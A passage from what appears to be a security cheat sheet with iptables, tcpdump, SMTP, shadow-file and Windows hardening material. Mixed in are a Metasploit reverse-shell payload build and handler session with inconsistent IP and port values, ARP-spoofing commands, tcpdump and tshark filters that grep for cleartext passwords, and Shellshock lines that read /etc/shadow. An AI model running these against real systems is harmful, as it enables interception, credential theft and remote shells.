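            self.chains[chain].insert(pos - 1, rule)

    @staticmethod
    def _matches(rule, pkt):
        if "-p" in rule and rule["-p"] != pkt["proto"]:
            return False
        for opt, key in (("-s", "src"), ("-d", "dst")):
            if opt in rule and ipaddress.ip_address(pkt[key]) not in ipaddress.ip_network(rule[opt], strict=False):
                return False
        for opt, key in (("-i", "in"), ("-o", "out")):
            if opt in rule and rule[opt] != pkt.get(key):
                return False
        for opt, key in (("--sport", "sport"), ("--dport", "dport")):
            lo, _, hi = rule.get(opt, "0:65535").partition(":")
            if not int(lo) <= pkt.get(key, 0) <= int(hi or lo):
                return False
        return "--state" not in rule or pkt.get("state") in rule["--state"].split(",")

    def verdict(self, chain, pkt):
        """Walk a chain top-down: ACCEPT/DROP/REJECT or the chain policy; None when
        a user-defined chain ends without a terminating match (control returns)."""
        for rule in self.chains[chain]:
            if not self._matches(rule, pkt):
                continue
            target = rule.get("-j")
            if target == "LOG":                 # LOG never ends traversal
                self.log.append("%s%s->%s" % (rule.get("--log-prefix", ""), pkt["src"], pkt["dst"]))
                continue
            if target in ("ACCEPT", "DROP", "REJECT"):
                return target
            sub = self.verdict(target, pkt)     # jump into a user-defined chain
            if sub is not None:
                return sub
        return self.policy.get(chain)


def evaluate(ruleset, packets, chain="INPUT"):
    """Load iptables lines; return ([verdict per packet], LOG messages)."""
    fw = Firewall()
    for line in ruleset:
        fw.run(line)
    return [fw.verdict(chain, pkt) for pkt in packets], fw.log


NOTES_RULESET = [                               # the 'You should now have' list above
    "iptables -A INPUT -i lo -j ACCEPT",
    "iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT",
    "iptables -A INPUT -p tcp --sport 80 -j ACCEPT",
    "iptables -A INPUT -p udp --sport 53 -j ACCEPT",
    "iptables -A INPUT -j DROP",
]
LOGGING_RULESET = [                             # default-drop plus the LOGGING chain above
    "# iptables -P INPUT DROP",
    "# iptables -N LOGGING",
    "# iptables -A INPUT -i lo -j ACCEPT",
    "# iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT",
    "# iptables -A INPUT -j LOGGING",
    '# iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables-Dropped: " --log-level 4',
    "# iptables -A LOGGING -j DROP",
]
SAMPLE_PACKETS = [   # constructed: loopback, a reply from a web server, a new inbound SSH attempt
    {"proto": "tcp", "src": "127.0.0.1", "dst": "127.0.0.1", "in": "lo", "sport": 5555, "dport": 22, "state": "NEW"},
    {"proto": "tcp", "src": "192.0.2.10", "dst": "192.168.1.100", "in": "eth0", "sport": 80, "dport": 40001, "state": "ESTABLISHED"},
    {"proto": "tcp", "src": "192.0.2.77", "dst": "192.168.1.100", "in": "eth0", "sport": 40002, "dport": 22, "state": "NEW"},
]
```

Both rulesets give the same verdicts for the three packets, but only the second one records the dropped SSH attempt, which is the point of routing the tail of INPUT through LOGGING. Inserting a rule with `-I INPUT 1` puts it ahead of everything else, which is how a single-source block like the `-I INPUT 2 -s 202.54.1.2 -j DROP` example takes effect before the state rule.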

NGREP

# for i in *; do ngrep -W byline -O /tmp/pcapname$i.pcap -qI $i host 1.2.3.4; done
# cd /tmp
# mergecap -w newpcapname.pcap pcapname*.pcap

TCPDUMP

ip[0] & 0x0f = 5 (finds all packets without IP options: a header length of 5 32-bit words = 20 bytes)

ip[0] & 0x0f > 5 (finds all packets with IP options, since the header is then longer than 20 bytes)

BITMASKING

The TCP flags byte (tcp[13]):

CWR | ECE | URG | ACK | PSH | RST | SYN | FIN

0 0 0 0 0 0 1 0 = 0x02 SYN
0 0 0 1 0 0 1 0 = 0x12 SYN/ACK
0 0 0 1 1 0 0 0 = 0x18 PUSH/ACK
0 0 0 1 0 0 0 1 = 0x11 FIN/ACK

Corresponding bit values (high nibble | low nibble):

8 4 2 1 | 8 4 2 1

Therefore:

tcp[13] = 0x02 (gives only packets with exactly the SYN flag set) - exclusive

tcp[13] & 0x02 = 0x02 (we don't care what the other flags look like as long as SYN is set) - inclusive

Using the same logic, we can be inclusive about some flags and exclusive about others:

tcp[13] & 0x0f = 0x02 (this says we want at least the SYN flag, we DON'T want the PSH, RST or FIN flags, BUT we do not care what the CWR, ECE, URG and ACK flags are)

Other examples:

tcp[12] & 0xf0 > 0x50 (here we are masking the high-order nibble of byte 12, the TCP header length in 32-bit words; we don't care what is in the low-order nibble. We just want anything with a header longer than 5 x 4 = 20 bytes, i.e. a TCP header carrying options)

tcp[13] & 0x14 != 0 (any flags, but at least the ACK or the RST flag has to be on)

The mask basically says: I only care about the bits specified in the mask.
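The byte-offset expressions above are easiest to trust once you have seen them select packets. The block below is an added example, not from the notes or from tcpdump: it builds a handful of IPv4/TCP headers with struct (checksums left zero, since the filters never look at them) and applies the same byte/mask tests that tcpdump compiles, with tcp[n] indexed relative to the start of the TCP header exactly as tcpdump does, so a packet carrying IP options still evaluates correctly. Packets and their names are constructed.

```python
"""Apply the tcpdump byte-offset / bitmask filters above to constructed packets.

Added example (not from the notes or libpcap). Packets are IPv4+TCP headers
built with struct; addresses and ports are constructed values.
"""
import struct

FIN, SYN, RST, PSH, ACK, URG, ECE, CWR = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80


def build_ipv4_tcp(flags, ip_options=b"", tcp_options=b""):
    """Return an IPv4 packet carrying a TCP header with the given flags.

    Option blobs must be multiples of 4 bytes. Checksums are left zero: the
    filters only examine header-length and flag bytes.
    """
    ihl = 5 + len(ip_options) // 4            # IP header length in 32-bit words
    doff = 5 + len(tcp_options) // 4          # TCP data offset in 32-bit words
    total = ihl * 4 + doff * 4
    ip_hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, total, 0, 0, 64, 6, 0,
                         bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])) + ip_options
    tcp_hdr = struct.pack("!HHIIBBHHH", 40000, 80, 0, 0, doff << 4, flags,
                          8192, 0, 0) + tcp_options
    return ip_hdr + tcp_hdr


def ip(pkt, off):
    """tcpdump's ip[off]: byte at offset off of the IP header."""
    return pkt[off]


def tcp(pkt, off):
    """tcpdump's tcp[off]: relative to the TCP header, after any IP options."""
    return pkt[(pkt[0] & 0x0f) * 4 + off]


# The expressions from the notes, as predicates over a raw packet.
FILTERS = {
    "ip[0] & 0x0f = 5": lambda p: ip(p, 0) & 0x0f == 5,
    "ip[0] & 0x0f > 5": lambda p: ip(p, 0) & 0x0f > 5,
    "tcp[13] = 0x02": lambda p: tcp(p, 13) == 0x02,
    "tcp[13] & 0x02 = 0x02": lambda p: tcp(p, 13) & 0x02 == 0x02,
    "tcp[13] & 0x0f = 0x02": lambda p: tcp(p, 13) & 0x0f == 0x02,
    "tcp[12] & 0xf0 > 0x50": lambda p: tcp(p, 12) & 0xf0 > 0x50,
    "tcp[13] & 0x14 != 0": lambda p: tcp(p, 13) & 0x14 != 0,
}


def matching_packets(expr, packets):
    """Names of the (name, bytes) packets selected by the named filter."""
    return [name for name, pkt in packets if FILTERS[expr](pkt)]


# Constructed packets; the names describe the flags and options set.
SAMPLE_PACKETS = [
    ("syn", build_ipv4_tcp(SYN)),
    ("syn-ece-cwr", build_ipv4_tcp(SYN | ECE | CWR)),                      # ECN-setup SYN
    ("syn-ack", build_ipv4_tcp(SYN | ACK)),
    ("push-ack", build_ipv4_tcp(PSH | ACK)),
    ("fin-ack", build_ipv4_tcp(FIN | ACK)),
    ("syn-mss", build_ipv4_tcp(SYN, tcp_options=b"\x02\x04\x05\xb4")),    # 24-byte TCP header
    ("syn-ipopts", build_ipv4_tcp(SYN, ip_options=b"\x01\x01\x01\x01")),  # NOP-padded IP options
]

if __name__ == "__main__":
    for expr in FILTERS:
        print("%-24s -> %s" % (expr, matching_packets(expr, SAMPLE_PACKETS)))
```

The exclusive test `tcp[13] = 0x02` misses the ECN-setup SYN (0xc2) that the inclusive `& 0x02` form catches, and only the packet with an MSS option satisfies the 0xf0 header-length test.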

1. Capture to a file named with the current date and time:

tcpdump -i eth1 -s0 -v -w /tmp/capture_`date +%d_%m_%Y__%H_%M_%S`.pcap

2. tcpdump top talkers: capture 2000 packets and print the sources seen more than 10 times:

tcpdump -tnn -c 2000 -i eth0 | awk -F "." '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -nr | awk '$1 > 10'

3. tcpdump check ping: capture only ICMP echo requests:

tcpdump -nni eth0 -e icmp[icmptype] == 8

4. Sniff network traffic on a given interface and display the IP addresses of the machines communicating with the current host (one IP per line):

sudo tcpdump -i wlan0 -n ip | awk '{ print gensub(/(.*)\..*/,"\\1","g",$3), $4, gensub(/(.*)\..*/,"\\1","g",$5) }' | awk -F " > " '{print $1"\n"$2}'

5. tcpdump sniff pop3, imap, smtp and http, then grep it:

tcpdump -i eth0 port http or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

6. All traffic except from a certain host:

sudo tcpdump -n -i eth0 -w data.pcap -v tcp or udp and 'not host 192.168.1.2'

SMTP

SMTP Commands

The following table lists the SMTP commands that are provided by the Microsoft Windows® SMTP service (SMTPSVC).

SMTP command - Command function

HELO - Sent by a client to identify itself, usually with a domain name.

EHLO - Enables the server to identify its support for Extended Simple Mail Transfer Protocol (ESMTP) commands.

MAIL FROM - Identifies the sender of the message; used in the form MAIL FROM:.

RCPT TO - Identifies the message recipients; used in the form RCPT TO:.

TURN - Allows the client and server to switch roles and send mail in the reverse direction without having to establish a new connection.

ATRN - The ATRN (Authenticated TURN) command optionally takes one or more domains as a parameter. The ATRN command must be rejected if the session has not been authenticated.

SIZE - Provides a mechanism by which the SMTP server can indicate the maximum size message supported. Compliant servers must provide size extensions to indicate the maximum size message that can be accepted. Clients should not send messages that are larger than the size indicated by the server.

ETRN - An extension of SMTP. ETRN is sent by an SMTP server to request that another server send any e-mail messages that it has.

PIPELINING - Provides the ability to send a stream of commands without waiting for a response after each command.

CHUNKING - An ESMTP command that replaces the DATA command. So that the SMTP host does not have to continuously scan for the end of the data, this command sends a BDAT command with an argument that contains the total number of bytes in a message. The receiving server counts the bytes in the message and, when the message size equals the value sent by the BDAT command, the server assumes it has received all of the message data.

DATA - Sent by a client to initiate the transfer of message content.

DSN - An ESMTP command that enables delivery status notifications.

RSET - Nullifies the entire message transaction and resets the buffer.

VRFY - Verifies that a mailbox is available for message delivery; for example, vrfy ted verifies that a mailbox for Ted resides on the local server. This command is off by default in Exchange implementations.

HELP - Returns a list of commands that are supported by the SMTP service.

QUIT - Terminates the session.

The following table lists the extended SMTP commands that Exchange makes available to the SMTP service.

Extended SMTP command - Command function

X-EXPS GSSAPI - A method that is used by Microsoft Exchange Server 2003 and Exchange 2000 Server servers to authenticate.

X-EXPS=LOGIN - A method that is used by Exchange 2000 and Exchange 2003 servers to authenticate.

X-EXCH50 - Provides the ability to propagate message properties during server-to-server communication.

X-LINK2STATE - Adds support for link state routing in Exchange.
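The command table says what each verb does but not how a server polices the order they arrive in, which is what you see when reading an SMTP capture. The block below is an added example, not from the notes and not Microsoft's SMTPSVC code: a minimal server-side state machine that enforces the expected sequence (HELO/EHLO, then MAIL FROM, RCPT TO, DATA), rejects ATRN when the session is not authenticated as the table requires, and answers VRFY with 252 when it is disabled, matching the table's note that it is off by default. Reply codes are the standard SMTP ones; the authentication flag is passed in rather than negotiated, and the client transcript is constructed.

```python
"""SMTP command sequencing for the verbs tabulated above.

Added example (not from the notes or SMTPSVC). SAMPLE_TRANSCRIPT is a
constructed client session; authentication state is a constructor flag.
"""
import re

COMMANDS = ("HELO", "EHLO", "MAIL", "RCPT", "DATA", "RSET", "VRFY", "ATRN", "HELP", "QUIT")


class SmtpSession:
    def __init__(self, authenticated=False, vrfy_enabled=False):
        self.authenticated = authenticated   # would be set by a completed AUTH exchange
        self.vrfy_enabled = vrfy_enabled     # off by default, as the table notes
        self.greeted = False
        self.sender = None
        self.recipients = []

    def handle(self, line):
        """Return the server reply for one client command line."""
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.greeted = True
            return "250 OK"
        if verb == "MAIL":
            if not self.greeted:
                return "503 Bad sequence of commands"
            m = re.fullmatch(r"FROM:\s*<([^>]*)>", arg, re.IGNORECASE)
            if not m:
                return "501 Syntax error in parameters or arguments"
            self.sender, self.recipients = m.group(1), []     # new transaction
            return "250 OK"
        if verb == "RCPT":
            if self.sender is None:
                return "503 Bad sequence of commands"
            m = re.fullmatch(r"TO:\s*<([^>]+)>", arg, re.IGNORECASE)
            if not m:
                return "501 Syntax error in parameters or arguments"
            self.recipients.append(m.group(1))
            return "250 OK"
        if verb == "DATA":
            if not self.recipients:                            # no accepted RCPT yet
                return "503 Bad sequence of commands"
            return "354 Start mail input; end with <CRLF>.<CRLF>"
        if verb == "RSET":
            self.sender, self.recipients = None, []
            return "250 OK"
        if verb == "VRFY":
            return ("250 " + arg) if self.vrfy_enabled else "252 Cannot VRFY user"
        if verb == "ATRN":
            return "250 OK" if self.authenticated else "530 Authentication required"
        if verb == "HELP":
            return "214 " + " ".join(COMMANDS)
        if verb == "QUIT":
            return "221 Closing connection"
        return "500 Command not recognized"


def reply_codes(transcript, **session_args):
    """Run client lines through one session; return the numeric reply codes."""
    session = SmtpSession(**session_args)
    return [int(session.handle(line)[:3]) for line in transcript]


# Constructed client session; example.test is a reserved name, not a real domain.
SAMPLE_TRANSCRIPT = [
    "RCPT TO:<bob@example.test>",        # out of order: no MAIL FROM yet
    "EHLO client.example.test",
    "MAIL FROM:<alice@example.test>",
    "RCPT TO:<bob@example.test>",
    "VRFY ted",                          # disabled by default
    "ATRN example.test",                 # session not authenticated
    "DATA",
    "QUIT",
]

if __name__ == "__main__":
    session = SmtpSession()
    for line in SAMPLE_TRANSCRIPT:
        print("C: %s\nS: %s" % (line, session.handle(line)))
```

A run of 503 replies in a capture usually means a client (or scanner) is issuing verbs without the preceding MAIL/RCPT exchange; a 252 to VRFY tells you the server is declining to confirm mailbox names rather than that the mailbox is absent.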

Metasploit Payloads: general process to create an exe

root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > show options
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST 172.16.104.130
LHOST => 172.16.104.130
msf exploit(handler) > set LPORT 3333
LPORT => 31337
msf exploit(handler) > exploit

PHP payload:

set PAYLOAD php/meterpreter/bind_tcp

Linux payload:

use payload/linux/x86/shell_reverse_tcp

EtterCap/Arpspoof

0.5. First enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward

1. A whole subnet:

ettercap -T -M arp:remote //192.168.119.0/24

2. Same thing using arpspoof:

arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null
killall arpspoof

3. Then use wireshark or tcpdump to capture traffic between the two.

4. Sniffing traffic with p0f:

p0f -i eth0 -o /tmp/p0f.pcap

tshark

Capture interface options:

-i <interface> name or idx of interface (def: first non-loopback)
-f <capture filter> packet filter in libpcap filter syntax
-s <snaplen> packet snapshot length (def: 65535)
-D print list of interfaces and exit
-d decode as. Ex: tshark -d tcp.port==8888,http
-c <packet count> stop after n packets (def: infinite)
-r read from a file
-Y <display filter> packet display filter in Wireshark display filter syntax
-n disable all name resolutions (def: all enabled)
-w <outfile|-> write packets to a pcap-format file named "outfile"
-T pdml|ps|psml|text|fields format of text output (def: text)
-e <field> field to print if -Tfields selected (e.g. tcp.port, col.Info); this option can be repeated to print multiple fields
-t a|ad|d|dd|e|r|u|ud output format of time stamps (def: r: rel. to first)
-u s|hms output format of seconds (def: s: seconds)

Samples:

tshark -r newcarve.pcap -Y "udp.srcport == 53" -n -T fields -e dns.qry.name -e dns.resp.addr
(reads a file, filters to DNS responses and displays the query name and response address fields)

tshark -n -r snort.log.1425686433 -Y http -T fields -e http.user_agent
(reads a file, filters to HTTP and then displays only the User-Agent field)

tshark -nr 2015-03-04.pcap -q -z follow,tcp,ascii,xxxxx
(exports just the payload of TCP stream xxxxx)

tshark -r test.pcap -Y 'http.request.method == POST and tcp contains "password"' | grep password

Script to dump every TCP stream matching a display filter (fill in srcfile and wsfilter):

#!/usr/bin/env python3

import subprocess

srcfile = ''    # pcap to read
wsfilter = ''   # Wireshark display filter selecting the streams of interest

# first list the distinct stream numbers matching the filter
tsharkcmd = "tshark -r " + srcfile + ' -Y "' + wsfilter + '" -T fields -e tcp.stream | sort -un > /tmp/tcpstream.txt'
subprocess.call(tsharkcmd, shell=True)

# then follow each stream and print its ASCII payload
with open('/tmp/tcpstream.txt', 'r') as tmpdst:
    for i in tmpdst:
        stream = i.strip()
        if stream:
            subprocess.call("tshark -nr " + srcfile + " -q -z follow,tcp,ascii," + stream, shell=True)

To dump ICMP payloads: tshark -r infile -Y icmp -T fields -e data | tr -d '\n' > hex.txt

# Then decode the hex with python:

with open('hex.txt', 'r') as f:
    hexdata = f.read().strip()
print(bytes.fromhex(hexdata).decode('ISO-8859-1'))   # or utf-8

Finding Recently Modified Files Recursively

Find last-modified files starting from the most recently changed:

$ find /etc -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort -r

To search for files in /target_directory and all its sub-directories that have been modified in the last 60 minutes:

$ find /target_directory -type f -mmin -60

To search for files in /target_directory and all its sub-directories that have been modified in the last 2 days:

$ find /target_directory -type f -mtime -2

To search for files in /target_directory and all its sub-directories no more than 3 levels deep that have been modified in the last 2 days:

$ find /target_directory -maxdepth 3 -type f -mtime -2

You can also specify a range of update times. To search for files in /target_directory and all its sub-directories that have been modified in the last 7 days, but not in the last 3 days:

$ find /target_directory -type f -mtime -7 ! -mtime -3

To search for files in /target_directory (and all its sub-directories) that have been modified in the last 60 minutes, and print out their file attributes:

$ find /target_directory -type f -mmin -60 -exec ls -al {} \;

Python3 Decoding Script

#!/usr/bin/env python3

import base64

x = input('Enter in the b64 string you wish to decode: ')
decoded = base64.b64decode(x.encode())
print(decoded.decode('utf-8', errors='replace'))

# uncomment this part and comment the other if you want to open and decode a file
#with open('./filelocation.txt', 'rb') as b64file:
#    filetext = base64.b64decode(b64file.read())
#print(filetext.decode('utf-8', errors='replace'))

/etc/shadow hash types

$1$  - md5
$2a$ - Blowfish
$2y$ - Blowfish, with correct handling of 8-bit characters
$5$  - sha-256
$6$  - sha-512
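The hash-type table above and the /etc/shadow field layout given under item 8 of the Fedora hardening steps together are what a shadow-file review needs. The block below is an added example, not from the notes: it splits each record into the nine colon-separated fields (the eight named in the notes plus the reserved trailing field), maps the $id$ prefix to the table above, and reports the account states an auditor looks for: an empty password field, a weak md5 or legacy crypt hash, and a password that is set but never expires. The records are constructed and the hash bodies are placeholders, not real digests.

```python
"""Parse /etc/shadow records and classify their password hashes.

Added example (not from the notes). SAMPLE_SHADOW is constructed; the hash
bodies are placeholder strings, not real digests.
"""
HASH_TYPES = {"1": "md5", "2a": "blowfish", "2y": "blowfish (8-bit safe)",
              "5": "sha-256", "6": "sha-512"}
FIELDS = ("user", "password", "last_changed", "min_days", "max_days",
          "warn", "inactive", "expire", "reserved")
WEAK = {"md5", "legacy crypt"}


def hash_type(field):
    """Classify the second (password) field of a shadow record."""
    if field == "":
        return "empty"
    if field[0] in "!*":
        return "locked"              # '!' = locked with passwd -l, '*' = no password login
    if field.startswith("$"):
        hash_id = field.split("$")[1]
        return HASH_TYPES.get(hash_id, "unknown ($%s$)" % hash_id)
    return "legacy crypt"            # no $id$ prefix: traditional DES crypt


def parse_shadow(text):
    """Return one dict per record, with the fields named as in the notes."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            raise ValueError("malformed shadow record: " + line)
        rec = dict(zip(FIELDS, parts))
        rec["hash_type"] = hash_type(rec["password"])
        records.append(rec)
    return records


def audit_shadow(text):
    """Return sorted (user, issue) pairs."""
    issues = []
    for rec in parse_shadow(text):
        kind = rec["hash_type"]
        if kind == "empty":
            issues.append((rec["user"], "empty password"))
        elif kind in WEAK:
            issues.append((rec["user"], "weak hash: " + kind))
        # an empty or 99999-day maximum means the password never has to change
        if kind not in ("empty", "locked") and rec["max_days"] in ("", "99999"):
            issues.append((rec["user"], "no password expiry"))
    return sorted(issues)


SAMPLE_SHADOW = """\
# constructed sample; hash bodies are placeholders, not real digests
root:$6$saltsalt$PLACEHOLDERHASH:18000:0:99999:7:::
alice:$5$saltsalt$PLACEHOLDERHASH:18000:7:60:7:::
legacy:$1$saltsalt$PLACEHOLDERHASH:17000:0:99999:7:::
svc-backup:*:18000:0:99999:7:::
bob:!$6$saltsalt$PLACEHOLDERHASH:18000:0:99999:7:::
guest::18000:0:99999:7:::
"""

if __name__ == "__main__":
    for rec in parse_shadow(SAMPLE_SHADOW):
        print("%-12s %s" % (rec["user"], rec["hash_type"]))
    for user, issue in audit_shadow(SAMPLE_SHADOW):
        print("ISSUE", user, issue)
```

Run it against the real file with `audit_shadow(open("/etc/shadow").read())` as root; the chage -M setting from item 8 is what clears the "no password expiry" finding.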

Finding ADS: dir /R

SHELL SHOCK

env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'

env x='() { :;}; cat /etc/shadow' bash -c 'echo hello'

Windows Hardening -raise UAC -services.msc

-msconfig/startup folder

-windows update

-IE Smart Screen Filter and other settings

-user account permissions - compmgmt.msc

-shares/file permissions

-update misc apps

-remove unecessary programs

-local security policy (secpol.msc, gpedit.msc)

-action center

-disable ipv6

-firewall used advanced sec options. Block inbound and outbound connections

-gpedit.msc/secpol.msc

GPEDIT/SECPOL.msc configs

Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\
  Minimum password length = 15

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\
  Interactive logon: Do not display last user name = enabled
  User Account Control: Virtualize file and registry write failures to per-user locations = enabled
  User Account Control: Only elevate UIAccess applications that are installed in secure locations = enabled
  User Account Control: Behavior of the elevation prompt for standard users = prompt for credentials on the secure desktop
  User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode = prompt for consent on the secure desktop
  MSS: (SafeDllSearchMode) Enable Safe DLL search mode (recommended) = enabled
  Shutdown: Allow system to be shut down without having to log on = enabled
  Interactive logon: Do not require CTRL+ALT+DEL = disabled

Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\
  Bypass traverse checking = Users, Network Service, Local Service, Administrators
  Allow log on locally = Administrators, Users

Computer Configuration\Administrative Templates\Windows Components\Credential User Interface\
  Require trusted path for credential entry = enabled

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Interactive logon: Do not require CTRL+ALT+DEL
  Interactive logon: Do not require CTRL+ALT+DEL = Disabled

Computer Configuration\Administrative Templates\Windows Components\AutoPlay Policies\
  Turn off Autoplay = enabled
  Turn off Autoplay = All drives
  Default behavior for AutoRun = Do not execute any autorun commands
  Turn off Autoplay for non-volume devices = enabled

Computer Configuration\Administrative Templates\Windows Components\NetMeeting\
  Disable remote Desktop Sharing = enabled

Computer Configuration\Administrative Templates\System\Internet Communication Management\Internet Communication settings\
  Turn off the Windows Messenger Customer Experience Improvement Program = enabled
  Turn off Help and Support Center "Did you know?" content = enabled
  Turn off Windows Customer Experience Improvement Program = enabled

Computer Configuration\Administrative Templates\Network\Microsoft Peer-to-Peer Networking Services\
  Turn off Microsoft Peer-to-Peer Networking Services = enabled

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Interactive logon: Smart card removal behavior
  Interactive logon: Smart card removal behavior = Lock Workstation

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Accounts: Guest account status
  Accounts: Guest account status = Disabled

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Accounts: Rename administrator account
  Accounts: Rename administrator account = Not Defined
  Accounts: Rename guest account = Not Defined

Computer Configuration\Administrative Templates\Windows Components\Windows Mail\
  Turn off the communities features = enabled
  Turn off Windows Mail application = enabled

Computer Configuration\Administrative Templates\System\Remote Assistance\
  Solicited Remote Assistance = disabled

Computer Configuration\Administrative Templates\Windows Components\HomeGroup\
  Prevent the computer from joining a homegroup = enabled

Computer Configuration\Windows Settings\Security Settings\Windows Firewall with Advanced Security\Windows Firewall with Advanced Security\Windows Firewall Properties\Public Profile\
  Windows Firewall: Public: Allow unicast response = No

User Configuration\Administrative Templates\Control Panel\Personalization\
  Password protect the screen saver = enabled

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\MSS: (ScreenSaverGracePeriod) The time in seconds before the screen saver grace period expires (0 recommended)
  MSS: (ScreenSaverGracePeriod) The time in seconds before the screen saver grace period expires (0 recommended) = 0

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Interactive logon: Display user information when the session is locked
  Interactive logon: Display user information when the session is locked = Enable

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\System cryptography: Force strong key protection for user keys stored on the computer
  System cryptography: Force strong key protection for user keys stored on the computer = Enable

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\User Account Control: Behavior of the elevation prompt for standard users
  User Account Control: Behavior of the elevation prompt for standard users = Automatically deny elevation requests

Computer Configuration\Administrative Templates\Windows Components\Windows Installer\Always install with elevated privileges
  Always install with elevated privileges = Disabled

Computer Configuration\Administrative Templates\System\Internet Communication Management\Internet Communication settings\Turn off downloading of print drivers over HTTP
  Turn off downloading of print drivers over HTTP = Enabled

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network access: Do not allow anonymous enumeration of SAM accounts and shares
  Network access: Do not allow anonymous enumeration of SAM accounts and shares = Enabled

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Shutdown: Clear virtual memory pagefile
  Shutdown: Clear virtual memory pagefile = Enable

Protocol 2

Protocol